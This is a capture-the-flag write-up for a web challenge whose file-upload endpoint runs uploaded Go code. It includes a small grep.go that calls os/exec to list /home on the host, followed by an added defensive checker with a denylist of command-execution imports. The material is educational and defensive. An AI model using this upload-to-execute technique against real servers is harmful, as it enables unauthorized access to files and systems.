CastorsCTF | Shortcuts

Description

A web app for those who are too lazy to SSH in.

http://web1.cybercastors.com:14437

Cracking

  • Going to the website, we just see a webpage with some ASCII art.


  • Looking at the source reveals that there is one endpoint in the website called /list


  • Going to the endpoint we see that we can upload some files so this should be RCE (Remote Code Execution)


grep.go

package main

import (
    "fmt"
    "os/exec"
)

func main() {
    // List /home to see which user directories exist on the host.
    out, _ := exec.Command("ls", "/home").Output()
    fmt.Println(string(out))
}

[This checks the users on this system]

  • Running this gives us


  • Now running ls on the home directory gives us some saucy stuff.


  • Now we just use the cat command to get the flag.
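
The defender's side of the same upload, as an added example that is not part of the original writeup or the challenge's code: a Go pre-execution check that parses only the import block of an uploaded file and flags packages such as os/exec. The FlagRiskyImports helper, the denylist and the sample input are assumptions made for illustration; this is a triage filter only, and uploaded code still has to run in an isolated, unprivileged sandbox.

```go
package main

import (
	"fmt"
	"go/parser"
	"go/token"
	"strconv"
)

// riskyImports is an assumed denylist for this example, not a complete one.
var riskyImports = map[string]bool{"os/exec": true, "syscall": true, "unsafe": true, "plugin": true, "C": true}

// FlagRiskyImports (hypothetical helper) returns denylisted imports; unparseable input is an error.
func FlagRiskyImports(src string) ([]string, error) {
	fset := token.NewFileSet()
	// ImportsOnly stops after the import declarations, so function bodies are never parsed.
	f, err := parser.ParseFile(fset, "upload.go", src, parser.ImportsOnly)
	if err != nil {
		return nil, fmt.Errorf("reject upload: not parseable Go: %w", err)
	}
	var hits []string
	for _, imp := range f.Imports {
		path, err := strconv.Unquote(imp.Path.Value)
		if err != nil {
			return nil, fmt.Errorf("reject upload: bad import path %s", imp.Path.Value)
		}
		if riskyImports[path] {
			hits = append(hits, path)
		}
	}
	return hits, nil
}

// sampleUpload is constructed input that mirrors the grep.go file shown above.
const sampleUpload = `package main
import (
	"fmt"
	"os/exec"
)

func main() {
	out, _ := exec.Command("ls", "/home").Output()
	fmt.Println(string(out))
}
`

func main() {
	hits, err := FlagRiskyImports(sampleUpload)
	fmt.Printf("flagged imports: %v, err: %v\n", hits, err)
}
```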


© Aayushman Choudhary 2021
